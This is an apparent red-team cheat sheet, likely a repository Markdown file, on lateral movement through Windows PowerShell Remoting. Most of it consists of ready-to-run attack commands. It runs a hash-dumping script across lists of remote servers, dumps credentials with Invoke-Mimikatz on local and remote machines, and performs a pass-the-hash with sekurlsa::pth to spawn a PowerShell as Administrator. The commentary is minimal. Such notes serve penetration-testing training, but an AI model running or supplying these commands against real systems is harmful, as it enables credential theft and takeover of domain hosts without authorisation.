Lateral Movement - Powershell Remoting

PSSession

Interactive
Runs in a new process (wsmprovhost)
Is stateful (session is tracked)

Useful cmdlets

New-PSSession -ComputerName computername.domainanme
Enter-PSSession -ComputerName computername.domainanme

We can use -Credential to pass username/password

To execute commands or scriptblocks

Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)

Invoke-Command -Scriptblock {whoami;hostname} -ComputerName computername.domainname

To execute scripts from files

Invoke-Command -FilePath C:\path\to\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_server>)

Execute `Stateful` commands

$Sess = New-PSSession -ComputerName computername

Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}

Mimikatz Powershell

Powershell script for mimikatz is used for dumping credentials ,tickets without dropping mimikatz exe to disk . It is used for passing , replaying hashes. Hashes can only be dumped with administrative privilieges

Dump credentials on local machine

Invoke-Mimikatz -DumpCreds

Dump credentials on multiple remote machines

Invoke-Mimikatz -DumpCreds -ComputerName @("computer1","computer2")

Generate tokens from hashes

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:computername.domain.name /ntlm:ntlmhash /run:powershell.exe"'

1.4 KiB Raw Permalink Blame History